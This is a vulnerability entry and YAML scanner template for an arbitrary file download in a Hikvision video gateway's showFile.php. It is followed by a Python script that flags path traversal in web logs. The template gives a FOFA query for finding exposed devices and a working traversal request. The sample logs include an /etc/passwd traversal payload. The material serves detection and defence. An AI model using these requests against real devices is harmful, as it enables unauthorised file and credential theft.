Vulnerability description
The Hikvision video access gateway system has an arbitrary file download vulnerability in the fileName parameter of the page /serverLog/showFile.php.
fofa: title="视频编码设备接入网关"
id: hikvision-showfile-file-read

info:
  name: HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
  author: zan8in
  severity: high
  description: |-
    海康威视视频接入网关系统在页面/serverLog/showFile.php的参数fileName存在任意文件下载漏洞
    fofa: title="视频编码设备接入网关"
  tags: hikvision,showfile,file-read
  created: 2024/01/17

rules:
  r0:
    request:
      method: GET
      path: /serverLog/showFile.php?fileName=../web/html/main.php
    expression: response.status == 200 && response.body.bcontains(b'$_SERVER[\'HTTP_HOST\'];') && response.body.bcontains(b'$_POST[\'userName\'];')
expression: r0()
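For defenders, the useful counterpart to the check above is spotting exploitation attempts of this endpoint in web server access logs. The following is an added example, not part of the original template or of any Hikvision code: it parses a few constructed Apache-style log lines, isolates requests to /serverLog/showFile.php, and flags any fileName value that, after URL decoding and path normalization, resolves outside the directory the endpoint is assumed to serve from (LOG_DIR, an assumption for the example). Decoding is done before normalization so that percent-encoded traversal sequences are not missed.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log lines (Apache combined-log style); not taken from any real device.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jan/2024:10:00:01 +0000] "GET /serverLog/showFile.php?fileName=20240117.log HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Jan/2024:10:00:02 +0000] "GET /serverLog/showFile.php?fileName=../web/html/main.php HTTP/1.1" 200 4096 "-" "curl/8.0"
10.0.0.9 - - [17/Jan/2024:10:00:03 +0000] "GET /serverLog/showFile.php?fileName=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.7 - - [17/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed directory the endpoint is meant to serve log files from (assumption for this example).
LOG_DIR = "/serverLog"


def is_traversal(file_name: str) -> bool:
    """True if fileName, after decoding and normalization, escapes LOG_DIR."""
    decoded = unquote(unquote(file_name))  # tolerate single and double percent-encoding
    if "\x00" in decoded or decoded.startswith(("/", "\\")):
        return True  # null-byte truncation or absolute path: never a legitimate log name
    candidate = posixpath.join(LOG_DIR, decoded.replace("\\", "/"))
    normalized = posixpath.normpath(candidate)
    return not normalized.startswith(LOG_DIR + "/")


def find_showfile_traversal(log_text: str) -> list[dict]:
    """Return one record per request to showFile.php whose fileName leaves LOG_DIR."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path.lower() != "/serverlog/showfile.php":
            continue
        # parse_qs percent-decodes once; is_traversal decodes again for double-encoded input.
        for name in parse_qs(parts.query, keep_blank_values=True).get("fileName", []):
            if is_traversal(name):
                hits.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "fileName": name,
                    "status": int(m["status"]),
                })
    return hits


if __name__ == "__main__":
    for hit in find_showfile_traversal(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} fileName={hit["fileName"]}')
```

A status of 200 on a flagged request is the signal that matters most: it indicates the gateway actually returned the requested file rather than rejecting the path, which is exactly what the template's expression checks for from the other side.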